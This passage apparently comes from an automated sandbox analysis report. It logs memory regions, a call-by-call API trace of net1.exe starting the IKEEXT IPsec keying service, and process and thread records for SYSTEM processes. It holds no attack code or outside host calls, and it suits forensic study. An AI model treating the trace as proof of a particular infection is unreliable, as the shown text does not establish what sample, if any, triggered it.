"private_0x0000000000010000" filename = "" Region: id = 1346 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1347 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1348 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 1349 start_va = 0x410000 end_va = 0x439fff entry_point = 0x412188 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 1350 start_va = 0x772a0000 end_va = 0x773dbfff entry_point = 0x772a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1351 start_va = 0x774e0000 end_va = 0x774e0fff entry_point = 0x774e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1352 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1353 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 1354 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1355 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1356 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1357 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1358 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1359 start_va = 0x370000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 1360 start_va = 0x6d0e0000 end_va = 0x6d0ecfff entry_point = 0x6d0e12d0 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 1361 start_va = 0x6fce0000 end_va = 0x6fcf7fff entry_point = 0x6fce1335 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 1362 start_va = 0x734e0000 end_va = 0x734eefff entry_point = 0x734e125e region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1363 start_va = 0x73a10000 end_va = 0x73a21fff entry_point = 0x73a14795 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 1364 start_va = 0x73e70000 end_va = 0x73e7efff entry_point = 0x73e712a1 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1365 start_va = 0x73e80000 end_va = 0x73e88fff entry_point = 0x73e815a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1366 start_va = 0x73e90000 end_va = 0x73ea0fff entry_point = 0x73e91300 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1367 start_va = 0x741a0000 end_va = 0x741a8fff entry_point = 0x741a1229 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1368 start_va = 0x74cd0000 end_va = 0x74cf1fff entry_point = 0x74cd53e9 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 1369 start_va = 0x75290000 end_va = 0x752a8fff entry_point = 0x75291319 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1370 start_va = 0x75470000 end_va = 0x754b9fff entry_point = 0x75477de0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1371 start_va = 0x756f0000 end_va = 0x75708fff entry_point = 0x756f4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1372 start_va = 0x75710000 end_va = 0x757b0fff entry_point = 0x75742433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1373 start_va = 0x764f0000 end_va = 0x7658ffff entry_point = 0x765049e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1374 start_va = 0x76590000 end_va = 0x76663fff entry_point = 0x765dbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1375 start_va = 0x76780000 end_va = 0x7682bfff entry_point = 0x7678a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1376 start_va = 0x76960000 end_va = 0x76994fff entry_point = 0x7696145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1377 start_va = 0x773e0000 end_va = 0x773e5fff entry_point = 0x773e1782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1378 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1379 start_va = 0x6d000000 end_va = 0x6d001fff entry_point = 0x6d000000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Region: id = 1380 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1381 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1382 start_va = 0x440000 end_va = 0x832fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Thread: id = 57 os_tid = 0xc40 [0048.830] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afbb4 | out: lpSystemTimeAsFileTime=0x1afbb4*(dwLowDateTime=0x4e61be40, dwHighDateTime=0x1d34280)) [0048.830] GetCurrentProcessId () returned 0xc3c [0048.830] GetCurrentThreadId () returned 0xc40 [0048.830] GetTickCount () returned 0x1400b [0048.830] QueryPerformanceCounter (in: lpPerformanceCount=0x1afbac | out: lpPerformanceCount=0x1afbac*=319116332) returned 1 [0048.830] GetModuleHandleA (lpModuleName=0x0) returned 0x410000 [0048.830] __set_app_type (_Type=0x1) [0048.830] __p__fmode () returned 0x768231f4 [0048.830] __p__commode () returned 0x768231fc [0048.830] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x41ffe6) returned 0x0 [0048.831] __getmainargs (in: _Argc=0x429064, _Argv=0x42906c, _Env=0x429068, _DoWildCard=0, _StartInfo=0x429024 | out: _Argc=0x429064, _Argv=0x42906c, _Env=0x429068) returned 0 [0048.831] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0048.831] GetConsoleOutputCP () returned 0x1b5 [0048.831] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x429080 | out: lpCPInfo=0x429080) returned 1 [0048.831] SetThreadUILanguage (LangId=0x0) returned 0x409 [0048.832] sprintf_s (in: _DstBuf=0x1afb6c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0048.832] setlocale (category=0, locale=".437") returned="English_United States.437" [0048.833] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0048.833] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0048.833] GetCommandLineW () returned="C:\\Windows\\system32\\net1 start ikeext" [0048.833] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1af938, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0048.833] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1afb3c | out: Buffer=0x1afb3c*=0x1de430) returned 0x0 [0048.833] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1afb3c | out: Buffer=0x1afb3c*=0x1de448) returned 0x0 [0048.833] _fileno (_File=0x76822900) returned 0 [0048.834] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0048.834] _wcsicmp (_String1="accounts", _String2="start") returned -18 [0048.834] _wcsicmp (_String1="computer", _String2="start") returned -16 [0048.834] _wcsicmp (_String1="config", _String2="start") returned -16 [0048.834] _wcsicmp (_String1="continue", _String2="start") returned -16 [0048.834] _wcsicmp (_String1="cont", _String2="start") returned -16 [0048.834] _wcsicmp (_String1="file", _String2="start") returned -13 [0048.834] _wcsicmp (_String1="files", _String2="start") returned -13 [0048.834] _wcsicmp (_String1="group", _String2="start") returned -12 [0048.834] _wcsicmp (_String1="groups", _String2="start") returned -12 [0048.834] _wcsicmp (_String1="help", _String2="start") returned -11 [0048.834] _wcsicmp (_String1="helpmsg", _String2="start") returned -11 [0048.834] _wcsicmp (_String1="localgroup", _String2="start") returned -7 [0048.834] _wcsicmp (_String1="pause", _String2="start") returned -3 [0048.834] _wcsicmp (_String1="session", _String2="start") returned -15 [0048.834] _wcsicmp (_String1="sessions", _String2="start") returned -15 [0048.834] _wcsicmp (_String1="sess", _String2="start") returned -15 [0048.834] _wcsicmp (_String1="share", _String2="start") returned -12 [0048.834] _wcsicmp (_String1="start", _String2="start") returned 0 [0048.834] _wcsicmp (_String1="accounts", _String2="ikeext") returned -8 [0048.834] _wcsicmp (_String1="computer", _String2="ikeext") returned -6 [0048.834] _wcsicmp (_String1="config", _String2="ikeext") returned -6 [0048.834] _wcsicmp (_String1="continue", _String2="ikeext") returned -6 [0048.834] _wcsicmp (_String1="cont", _String2="ikeext") returned -6 [0048.834] _wcsicmp (_String1="file", _String2="ikeext") returned -3 [0048.834] _wcsicmp (_String1="files", _String2="ikeext") returned -3 [0048.834] _wcsicmp (_String1="group", _String2="ikeext") returned -2 [0048.834] _wcsicmp (_String1="groups", _String2="ikeext") returned -2 [0048.834] _wcsicmp (_String1="help", _String2="ikeext") returned -1 [0048.834] _wcsicmp (_String1="helpmsg", _String2="ikeext") returned -1 [0048.834] _wcsicmp (_String1="localgroup", _String2="ikeext") returned 3 [0048.834] _wcsicmp (_String1="pause", _String2="ikeext") returned 7 [0048.834] _wcsicmp (_String1="session", _String2="ikeext") returned 10 [0048.834] _wcsicmp (_String1="sessions", _String2="ikeext") returned 10 [0048.834] _wcsicmp (_String1="sess", _String2="ikeext") returned 10 [0048.834] _wcsicmp (_String1="share", _String2="ikeext") returned 10 [0048.834] _wcsicmp (_String1="start", _String2="ikeext") returned 10 [0048.834] _wcsicmp (_String1="stats", _String2="ikeext") returned 10 [0048.834] _wcsicmp (_String1="statistics", _String2="ikeext") returned 10 [0048.834] _wcsicmp (_String1="stop", _String2="ikeext") returned 10 [0048.834] _wcsicmp (_String1="time", _String2="ikeext") returned 11 [0048.834] _wcsicmp (_String1="user", _String2="ikeext") returned 12 [0048.834] _wcsicmp (_String1="users", _String2="ikeext") returned 12 [0048.834] _wcsicmp (_String1="msg", _String2="ikeext") returned 4 [0048.834] _wcsicmp (_String1="messenger", _String2="ikeext") returned 4 [0048.835] _wcsicmp (_String1="receiver", _String2="ikeext") returned 9 [0048.835] _wcsicmp (_String1="rcv", _String2="ikeext") returned 9 [0048.835] _wcsicmp (_String1="netpopup", _String2="ikeext") returned 5 [0048.835] _wcsicmp (_String1="redirector", _String2="ikeext") returned 9 [0048.835] _wcsicmp (_String1="redir", _String2="ikeext") returned 9 [0048.835] _wcsicmp (_String1="rdr", _String2="ikeext") returned 9 [0048.835] _wcsicmp (_String1="workstation", _String2="ikeext") returned 14 [0048.835] _wcsicmp (_String1="work", _String2="ikeext") returned 14 [0048.835] _wcsicmp (_String1="wksta", _String2="ikeext") returned 14 [0048.835] _wcsicmp (_String1="prdr", _String2="ikeext") returned 7 [0048.835] _wcsicmp (_String1="devrdr", _String2="ikeext") returned -5 [0048.835] _wcsicmp (_String1="lanmanworkstation", _String2="ikeext") returned 3 [0048.835] _wcsicmp (_String1="server", _String2="ikeext") returned 10 [0048.835] _wcsicmp (_String1="svr", _String2="ikeext") returned 10 [0048.835] _wcsicmp (_String1="srv", _String2="ikeext") returned 10 [0048.835] _wcsicmp (_String1="lanmanserver", _String2="ikeext") returned 3 [0048.835] _wcsicmp (_String1="alerter", _String2="ikeext") returned -8 [0048.835] _wcsicmp (_String1="netlogon", _String2="ikeext") returned 5 [0048.835] _wcsupr (in: _String="ikeext" | out: _String="IKEEXT") returned="IKEEXT" [0048.835] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x1e33b8 [0048.837] GetServiceKeyNameW (in: hSCManager=0x1e33b8, lpDisplayName="IKEEXT", lpServiceName=0x42aaf0, lpcchBuffer=0x1afad4 | out: lpServiceName="", lpcchBuffer=0x1afad4) returned 0 [0048.837] _wcsicmp (_String1="msg", _String2="IKEEXT") returned 4 [0048.837] _wcsicmp (_String1="messenger", _String2="IKEEXT") returned 4 [0048.837] _wcsicmp (_String1="receiver", _String2="IKEEXT") returned 9 [0048.837] _wcsicmp (_String1="rcv", _String2="IKEEXT") returned 9 [0048.837] _wcsicmp (_String1="redirector", _String2="IKEEXT") returned 9 [0048.837] _wcsicmp (_String1="redir", _String2="IKEEXT") returned 9 [0048.837] _wcsicmp (_String1="rdr", _String2="IKEEXT") returned 9 [0048.838] _wcsicmp (_String1="workstation", _String2="IKEEXT") returned 14 [0048.838] _wcsicmp (_String1="work", _String2="IKEEXT") returned 14 [0048.838] _wcsicmp (_String1="wksta", _String2="IKEEXT") returned 14 [0048.838] _wcsicmp (_String1="prdr", _String2="IKEEXT") returned 7 [0048.838] _wcsicmp (_String1="devrdr", _String2="IKEEXT") returned -5 [0048.838] _wcsicmp (_String1="lanmanworkstation", _String2="IKEEXT") returned 3 [0048.838] _wcsicmp (_String1="server", _String2="IKEEXT") returned 10 [0048.838] _wcsicmp (_String1="svr", _String2="IKEEXT") returned 10 [0048.838] _wcsicmp (_String1="srv", _String2="IKEEXT") returned 10 [0048.838] _wcsicmp (_String1="lanmanserver", _String2="IKEEXT") returned 3 [0048.838] _wcsicmp (_String1="alerter", _String2="IKEEXT") returned -8 [0048.838] _wcsicmp (_String1="netlogon", _String2="IKEEXT") returned 5 [0048.838] NetServiceControl (in: servername=0x0, service="IKEEXT", opcode=0x0, arg=0x0, bufptr=0x1afac8 | out: bufptr=0x1afac8) returned 0x0 [0048.839] NetServiceInstall (in: servername=0x0, service="IKEEXT", argc=0x0, argv=0x0, bufptr=0x1afab8 | out: bufptr=0x1afab8) returned 0x0 [0048.841] GetServiceDisplayNameW (in: hSCManager=0x1e33b8, lpServiceName="IKEEXT", lpDisplayName=0x431fc0, lpcchBuffer=0x1afa90 | out: lpDisplayName="IKE and AuthIP IPsec Keying Modules", lpcchBuffer=0x1afa90) returned 1 [0048.842] wcscpy_s (in: _Destination=0x42a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0048.842] LoadLibraryW (lpLibFileName="NETMSG") returned 0x6d000000 [0048.843] FormatMessageW (in: dwFlags=0x2800, lpSource=0x6d000000, dwMessageId=0xdc2, dwLanguageId=0x0, lpBuffer=0x42b338, nSize=0x800, Arguments=0x429dd8 | out: lpBuffer="The IKE and AuthIP IPsec Keying Modules service is starting") returned 0x3b [0048.844] GetFileType (hFile=0x7) returned 0x2 [0048.844] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1afa1c | out: lpMode=0x1afa1c) returned 1 [0048.844] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x42b338*, nNumberOfCharsToWrite=0x3b, lpNumberOfCharsWritten=0x1afa3c, lpReserved=0x0 | out: lpBuffer=0x42b338*, lpNumberOfCharsWritten=0x1afa3c*=0x3b) returned 1 [0048.844] NetapipBufferAllocate () returned 0x0 [0048.844] _vsnwprintf_s (in: _Buffer=0x434880, _BufferCount=0x1001, _MaxCount=0x1000, _Format=".", _ArgList=0x1afa98 | out: _Buffer=".") returned 1 [0048.844] GetFileType (hFile=0x7) returned 0x2 [0048.845] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1afa4c | out: lpMode=0x1afa4c) returned 1 [0048.845] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x434880*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1afa6c, lpReserved=0x0 | out: lpBuffer=0x434880*, lpNumberOfCharsWritten=0x1afa6c*=0x1) returned 1 [0048.845] Sleep (dwMilliseconds=0x7d0) [0050.856] NetApiBufferFree (Buffer=0x1e6ff0) returned 0x0 [0050.856] NetServiceControl (in: servername=0x0, service="IKEEXT", opcode=0x0, arg=0x0, bufptr=0x1afac8 | out: bufptr=0x1afac8) returned 0x0 [0050.858] _vsnwprintf_s (in: _Buffer=0x434880, _BufferCount=0x1001, _MaxCount=0x1000, _Format="\r\n", _ArgList=0x1afa98 | out: _Buffer="\r\n") returned 2 [0050.858] GetFileType (hFile=0x7) returned 0x2 [0050.858] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1afa4c | out: lpMode=0x1afa4c) returned 1 [0050.858] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x434880*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1afa6c, lpReserved=0x0 | out: lpBuffer=0x434880*, lpNumberOfCharsWritten=0x1afa6c*=0x2) returned 1 [0050.858] GetServiceDisplayNameW (in: hSCManager=0x1e33b8, lpServiceName="IKEEXT", lpDisplayName=0x431fc0, lpcchBuffer=0x1afa90 | out: lpDisplayName="IKE and AuthIP IPsec Keying Modules", lpcchBuffer=0x1afa90) returned 1 [0050.859] FormatMessageW (in: dwFlags=0x2800, lpSource=0x6d000000, dwMessageId=0xdc4, dwLanguageId=0x0, lpBuffer=0x42b338, nSize=0x800, Arguments=0x429dd8 | out: lpBuffer="The IKE and AuthIP IPsec Keying Modules service was started successfully.\r\n") returned 0x4b [0050.859] GetFileType (hFile=0x7) returned 0x2 [0050.859] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1afa1c | out: lpMode=0x1afa1c) returned 1 [0050.859] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x42b338*, nNumberOfCharsToWrite=0x4b, lpNumberOfCharsWritten=0x1afa3c, lpReserved=0x0 | out: lpBuffer=0x42b338*, lpNumberOfCharsWritten=0x1afa3c*=0x4b) returned 1 [0050.859] GetFileType (hFile=0x7) returned 0x2 [0050.859] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1afa1c | out: lpMode=0x1afa1c) returned 1 [0050.860] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4116cc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1afa3c, lpReserved=0x0 | out: lpBuffer=0x4116cc*, lpNumberOfCharsWritten=0x1afa3c*=0x2) returned 1 [0050.860] NetApiBufferFree (Buffer=0x1e6ff0) returned 0x0 [0050.860] NetApiBufferFree (Buffer=0x1e6900) returned 0x0 [0050.860] NetApiBufferFree (Buffer=0x1de430) returned 0x0 [0050.860] NetApiBufferFree (Buffer=0x1de448) returned 0x0 [0050.860] GetCommandLineW () returned="C:\\Windows\\system32\\net1 start ikeext" [0050.860] exit (_Code=0) Process: id = "21" image_name = "System Idle Process" filename = "" page_root = "0x185000" os_pid = "0x0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "created_daemon" parent_id = "20" os_parent_pid = "0xc3c" cmd_line = "" cur_dir = "" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 58 os_tid = 0x0 Process: id = "22" image_name = "System" filename = "" page_root = "0x185000" os_pid = "0x4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "created_daemon" parent_id = "20" os_parent_pid = "0xc3c" cmd_line = "" cur_dir = "" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 1558 start_va = 0x10000 end_va = 0x32fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1559 start_va = 0x40000 end_va = 0x5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1560 start_va = 0x60000 end_va = 0x7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1561 start_va = 0x80000 end_va = 0x9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 1562 start_va = 0xa0000 end_va = 0xbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 1563 start_va = 0xc0000 end_va = 0xdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1564 start_va = 0xe0000 end_va = 0xfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1565 start_va = 0x100000 end_va = 0x11ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 1566 start_va = 0x120000 end_va = 0x13ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 1567 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 1568 start_va = 0x150000 end_va = 0x16ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 1569 start_va = 0x170000 end_va = 0x18ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 1570 start_va = 0x190000 end_va = 0x1affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1571 start_va = 0x1b0000 end_va = 0x1cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1572 start_va = 0x1d0000 end_va = 0x1effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 1573 start_va = 0x1f0000 end_va = 0x20ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1574 start_va = 0x210000 end_va = 0x22ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 1575 start_va = 0x230000 end_va = 0x24ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 1576 start_va = 0x250000 end_va = 0x26ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1577 start_va = 0x270000 end_va = 0x28ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1578 start_va = 0x290000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 1579 start_va = 0x2b0000 end_va = 0x2cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 1580 start_va = 0x2d0000 end_va = 0x2effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 1581 start_va = 0x2f0000 end_va = 0x30ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1582 start_va = 0x310000 end_va = 0x32ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 1583 start_va = 0x330000 end_va = 0x34ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1584 start_va = 0x350000 end_va = 0x36ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 1585 start_va = 0x370000 end_va = 0x38ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1586 start_va = 0x390000 end_va = 0x3affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 1587 start_va = 0x3b0000 end_va = 0x3cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1588 start_va = 0x3d0000 end_va = 0x3effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 1589 start_va = 0x3f0000 end_va = 0x40ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1590 start_va = 0x410000 end_va = 0x42ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1591 start_va = 0x430000 end_va = 0x44ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 1592 start_va = 0x450000 end_va = 0x46ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1593 start_va = 0x772a0000 end_va = 0x773dbfff entry_point = 0x772a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 59 os_tid = 0xadc Thread: id = 60 os_tid = 0xacc Thread: id = 61 os_tid = 0xac0 Thread: id = 62 os_tid = 0xabc Thread: id = 63 os_tid = 0xa84 Thread: id = 64 os_tid = 0xa28 Thread: id = 65 os_tid = 0x9cc Thread: id = 66 os_tid = 0x4ac Thread: id = 67 os_tid = 0x154 Thread: id = 68 os_tid = 0x384 Thread: id = 69 os_tid = 0x7dc Thread: id = 70 os_tid = 0x154 Thread: id = 71 os_tid = 0x6f4 Thread: id = 72 os_tid = 0x6d4 Thread: id = 73 os_tid = 0x6c8 Thread: id = 74 os_tid = 0x6b0 Thread: id = 75 os_tid = 0x6a4 Thread: id = 76 os_tid = 0x690 Thread: id = 77 os_tid = 0x5e4 Thread: id = 78 os_tid = 0x560 Thread: id = 79 os_tid = 0x55c Thread: id = 80 os_tid = 0x558 Thread: id = 81 os_tid = 0x514 Thread: id = 82 os_tid = 0x488 Thread: id = 83 os_tid = 0x484 Thread: id = 84 os_tid = 0x480 Thread: id = 85 os_tid = 0x3c0 Thread: id = 86 os_tid = 0x3bc Thread: id = 87 os_tid = 0x30c Thread: id = 88 os_tid = 0x290 Thread: id = 89 os_tid = 0x228 Thread: id = 90 os_tid = 0x19c Thread: id = 91 os_tid = 0x160 Thread: id = 92 os_tid = 0x15c Thread: id = 93 os_tid = 0x158 Thread: id = 94 os_tid = 0x154 Thread: id = 95 os_tid = 0x13c Thread: id = 96 os_tid = 0x138 Thread: id = 97 os_tid = 0x134 Thread: id = 98 os_tid = 0x130 Thread: id = 99 os_tid = 0x12c Thread: id = 100 os_tid = 0x128 Thread: id = 101 os_tid = 0x124 Thread: id = 102 os_tid = 0x114 Thread: id = 103 os_tid = 0x110 Thread: id = 104 os_tid = 0xf8 Thread: id = 105 os_tid = 0xfc Thread: id = 106 os_tid = 0x100 Thread: id = 107 os_tid = 0x104 Thread: id = 108 os_tid = 0xf0 Thread: id = 109 os_tid = 0xec Thread: id = 110 os_tid = 0xe8 Thread: id = 111 os_tid = 0xe4 Thread: id = 112 os_tid = 0xe0 Thread: id = 113 os_tid = 0xdc Thread: id = 114 os_tid = 0xd8 Thread: id = 115 os_tid = 0xd4 Thread: id = 116 os_tid = 0xd0 Thread: id = 117 os_tid = 0xcc Thread: id = 118 os_tid = 0xc8 Thread: id = 119 os_tid = 0xc4 Thread: id = 120 os_tid = 0xc0 Thread: id = 121 os_tid = 0xbc Thread: id = 122 os_tid = 0xb8 Thread: id = 123 os_tid = 0xb4 Thread: id = 124 os_tid = 0xb0 Thread: id = 125 os_tid = 0xac Thread: id = 126 os_tid = 0xa8 Thread: id = 127 os_tid = 0xa4 Thread: id = 128 os_tid = 